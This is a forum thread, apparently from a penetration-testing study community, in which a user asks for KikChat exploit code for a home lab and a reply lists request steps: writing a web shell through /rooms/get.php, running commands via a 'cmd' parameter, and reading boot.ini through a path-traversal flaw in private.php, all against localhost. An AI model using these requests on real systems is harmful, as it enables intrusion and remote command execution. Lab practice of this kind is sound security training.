KikChat LFI/RFI exploit code?



  • I've been reading about PWK-Example-Report-v1.pdf on pages 7-14 and found that KikChat apps were used in the example.

    https://www.exploit-db.com/exploits/30235

    Copy of the vulnerable app is available at exploit-db.

    However, the actual exploit code/script is no longer there.

    I was wondering what is the content of the exploit code above as I would like to reproduce a similar scenario in my lab.



  • As it can be seen on the link that you shared: https://www.exploit-db.com/exploits/30235

    The vulnerability can directly exploited with simple GET requests therefore elaborated exploits are not required.

    There is a RCE on /room/get.php and you need to replicate the following steps in order to create a file called shell.php that will be your web shell:

    1. Create the file called shell.php. This file will execute the command assigned on the "cmd" GET variable :

    http://127.0.0.1/KikChat/rooms/get.php?name=shell.php&ROOM= ```

    1. Access the file and get command execution using the "cmd" get variable:

    http://127.0.0.1/KikChat/myroom/shell.php?cmd=whoami;

    There is also a LFI on the /KikChat/private.php page on the name parameter:

    http://127.0.0.1/KikChat/private.php?name=../../../../../../../../../../boot.ini
    

Log in to reply
 

Suggested Topics

  • 2
  • 2
  • 2
  • 2
  • 2
  • 2
  • 2
  • 2